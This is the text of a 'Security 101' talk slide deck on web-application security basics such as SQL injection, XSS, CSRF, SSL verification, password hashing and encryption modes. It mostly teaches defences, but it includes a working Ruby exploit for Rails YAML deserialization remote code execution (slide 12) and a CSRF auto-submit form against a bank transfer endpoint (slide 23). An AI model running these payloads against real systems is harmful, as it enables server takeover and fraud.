Slide 1

Slide 1 text

Dirkjan Bussink [email protected] twitter.com/dbussink github.com/dbussink

Slide 2

Slide 2 text

Security 101 The very very basics

Slide 3

Slide 3 text

Not part of today

Slide 4

Slide 4 text

Social Engineering Because there is no patch for human stupidity

Slide 5

Slide 5 text

statement = "SELECT * FROM users WHERE name = '" + username + "'" SQL Injection

Slide 6

Slide 6 text

No content

Slide 7

Slide 7 text

statement = ["SELECT * FROM users WHERE name = ?", username] SQL Injection Parameter binding

Slide 8

Slide 8 text

Cross site scripting
<%= person.name %>
Inject Javascript!

Slide 9

Slide 9 text

Mass assignment What if I add this?

Slide 10

Slide 10 text

Frameworks Solve it easily for you

Slide 11

Slide 11 text

Remote code execution Let the server run my ruby rce.rb "Process.exit!"

Slide 12

Slide 12 text

require 'net/http' require 'net/https' require 'uri' require 'yaml' code = ARVG[0] url = "http://localhost:3000" escaped_code = "foo; #{code}\n__END__\n" yaml = %{ --- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection ? #{escaped_code.to_yaml.sub('--- ','').chomp} : !ruby/object:OpenStruct table: :defaults: :action: create :controller: foos :required_parts: [] :requirements: :action: create :controller: foos :segment_keys: - :format modifiable: true }.strip xml = %{ #{yaml} }.strip uri = URI.parse(url) http = Net::HTTP.new(uri.host, uri.port) request = Net::HTTP::Post.new(uri.request_uri, "X-HTTP-Method-Override" => "GET") request.content_type = "text/xml" request.set_body_internal(xml) response = http.request(request)

Slide 13

Slide 13 text

Direct object references http://myapp.com/people/1 Let’s change this to 2!

Slide 14

Slide 14 text

Access control Scope your queries

Slide 15

Slide 15 text

External input Trust nobody

Slide 16

Slide 16 text

No content

Slide 17

Slide 17 text

Set-Cookie: session_id=lee2oochaekae4woh6A; path=/; document.cookie => "session_id=lee2oochaekae4woh6A;" Steal cookie in combination with a XSS attack

Slide 18

Slide 18 text

Set-Cookie: session_id=lee2oochaekae4woh6A; path=/; HttpOnly document.cookie => "" HttpOnly Disallows reading by Javascript

Slide 19

Slide 19 text

Set-Cookie: session_id=lee2oochaekae4woh6A; path=/; HttpOnly; secure Secure Only send cookie over HTTPS

Slide 20

Slide 20 text

Frameworks Use one that solves this

Slide 21

Slide 21 text

CSRF Who submits your forms?

Slide 22

Slide 22 text

No content

Slide 23

Slide 23 text

On my evil hack site Just loading my page transfers money document.write('<form target=hack name=go method=post action="http://mybank.com/transfer.php"> </form>') go.submit()

Slide 24

Slide 24 text

Add token to each form Token ensures other site can’t simply POST to your

Slide 25

Slide 25 text

Hash DOS Crafting input to do DOS attack

Slide 26

Slide 26 text

Bucket 0 1 2 3 4 5 Figure 1: Normal operation of a hash table. suggested the use of crypto puzzles [9] to force clients to perform more work before the server does its work. Provably requiring the client to con- sume CPU time may make sense for fundamen- tally expensive operations like RSA decryption, but it seems out of place when the expensive opera- tion (e.g., HTML table layout) is only expensive because a poor algorithm was used in the system. Another recent paper [16] is a toolkit that allows programmers to inject sensors and actuators into a program. When a resource abuse is detected an ap- propriate action is taken. Bucket 0 1 2 3 4 5 Figure 2: Worst-case hash table collisions. bles are so common that programming languages like Perl provide syntactic sugar to represent hash tables as “associative arrays,” making them easy for programmers to use. Programmers clearly prefer hash tables for their constant-time expected behav- ior, despite their worst-case O(n) per-operation run- ning time. After all, what are the odds that a hash table will degenerate to its worst case behavior? In typical usage, objects to be inserted into a hashtable are first reduced to a 32-bit hash value. Strings might be hashed using a checksum oper- Craft input for collision

Slide 27

Slide 27 text

Hashes everywhere A lot of attack vectors

Slide 28

Slide 28 text

SSL in your app Verify certificates

Slide 29

Slide 29 text

curl_easy_setopt(download_handle, CURLOPT_SSL_VERIFYHOST, 2); 2 is the magic value...

Slide 30

Slide 30 text

$fp = fsockopen ('ssl://www.paypal.com', 443, $errno, $errstr, 30); fsockopen() does not validate server certificate PHP

Slide 31

Slide 31 text

The “advanced” SSLSocketFactory API silently skips hostname verification if the algorithm field in the SSL client is NULL or an empty string rather than HTTPS Java Why this as the default?

Slide 32

Slide 32 text

require "net/http" require "net/https" require "uri" uri = URI.parse("https://secure.site/") http = Net::HTTP.new uri.host, uri.port http.use_ssl = true http.verify_mode = OpenSSL::SSL::VERIFY_PEER request = Net::HTTP::Get.new(uri.request_uri) response = http.request(request) Ruby Does not validate certificate by default...

Slide 33

Slide 33 text

Stupid API’s Know how to work with them

Slide 34

Slide 34 text

Storing passwords Can I get the passwords stored in your database?

Slide 35

Slide 35 text

No content

Slide 36

Slide 36 text

But I’m safe, I hash and salt! Digest::SHA1.hexdigest( "#{password}--#{salt}" )

Slide 37

Slide 37 text

1.93% were between 6 and 10 characters long 2.45% were comprised entirely of lowercase characters 3.36% were found in a common password dictionary 4.67% were reused by the same person on a totally unrelated service (Gawker) 5.Only 1% of them contained a non-alphanumeric character 77 million breached PlayStation Network accounts

Slide 38

Slide 38 text

260M checks / second GPU acceleration makes forcing viable these days

Slide 39

Slide 39 text

Salted hashes are not good enough anymore

Slide 40

Slide 40 text

Libraries Use them, don’t roll your ow

Slide 41

Slide 41 text

bcrypt PBKDF2 scrypt

Slide 42

Slide 42 text

Designed to be slow

Slide 43

Slide 43 text

KDF 6 letters 8 letters 8 chars 10 chars 40-char text DES CRYPT < $1 < $1 < $1 < $1 < $1 MD5 < $1 < $1 < $1 $1.1k $1 MD5 CRYPT < $1 < $1 $130 $1.1M $1.4k PBKDF2 (100 ms) < $1 < $1 $18k $160M $200k bcrypt (95 ms) < $1 $4 $130k $1.2B $1.5M scrypt (64 ms) < $1 $150 $4.8M $43B $52M PBKDF2 (5.0 s) < $1 $29 $920k $8.3B $10M bcrypt (3.0 s) < $1 $130 $4.3M $39B $47M scrypt (3.8 s) $900 $610k $19B $175T $210B

Slide 44

Slide 44 text

I have something else now! Migration is not very hard

Slide 45

Slide 45 text

Add new authentication When user logs in, store password in new way After X time remove old passwords

Slide 46

Slide 46 text

Signing Don’t design your own

Slide 47

Slide 47 text

user_id=1--kee0oiviemaeXiW7aeb8eexuthohyua Signed cookies Hash computed with secret

Slide 48

Slide 48 text

http://myapp.com/profile/1/wa5eexuf9wiex1do Email URL with direct login Hash for one time login

Slide 49

Slide 49 text

Digest::SHA1.hexdigest( "user_id=#{id}-#{secret_token}" ) Hash with a secret Broken

Slide 50

Slide 50 text

sha256 = OpenSSL::Digest::Digest.new('sha256') tag = OpenSSL::HMAC.hexdigest(sha256, secret_token, message) HMAC hash-based message authentication code

Slide 51

Slide 51 text

Encryption Know what you are doing

Slide 52

Slide 52 text

AES ECB Just don’t use it

Slide 53

Slide 53 text

No content

Slide 54

Slide 54 text

AES CBC / CTR When using CBC mode, an Initialization Vector (IV) is provided along with the key when starting an encrypt or decrypt operation. If CBC mode is selected and no IV is provided, an IV of all zeroes will be used.

Slide 55

Slide 55 text

Don’t trust input Also sign encrypted data

Slide 56

Slide 56 text

cookie = "j2x+8Y5CqDRnYqRvMsHmi61YBzA7qvc4f7agmYxdHgvqz 7Jaekoxjp3MrgSvB3GU--kc/FbSvFIfIFzM0UzQhhvw==" Encrypted cookie aes-128-cbc

Slide 57

Slide 57 text

"so long, and thanks for all the fish"

Slide 58

Slide 58 text

Encrypt then MAC Verify that the data is authentic

Slide 59

Slide 59 text

Authenticated encryption

Slide 60

Slide 60 text

No content

Slide 61

Slide 61 text

https://www.owasp.org/index.php/Top_10_2010-Main https://www.owasp.org/index.php/SQL_Injection https://www.owasp.org/index.php/Top_10_2010-A4 https://www.owasp.org/index.php/Cross-site_Scripting_(XSS) https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF) http://www.cs.rice.edu/~scrosby/hash/CrosbyWallach_UsenixSec2003.pdf http://www.cs.utexas.edu/~shmat/shmat_ccs12.pdf http://www.troyhunt.com/2011/06/brief-sony-password-analysis.html http://gpuscience.com/cs/cracking-salted-sha1-password-hashes-on-gpu/ http://www.bsdcan.org/2009/schedule/attachments/86_scrypt_slides.pdf http://en.wikipedia.org/wiki/Hash-based_message_authentication_code http://blog.jcoglan.com/2012/06/09/why-you-should-never-use-hash-functions-for-message-authentication/ http://en.wikipedia.org/wiki/Block_cipher_modes_of_operation#Electronic_codebook_.28ECB.29 http://en.wikipedia.org/wiki/Padding_oracle_attack http://tonyarcieri.com/all-the-crypto-code-youve-ever-written-is-probably-broken https://www.coursera.org/course/crypto Background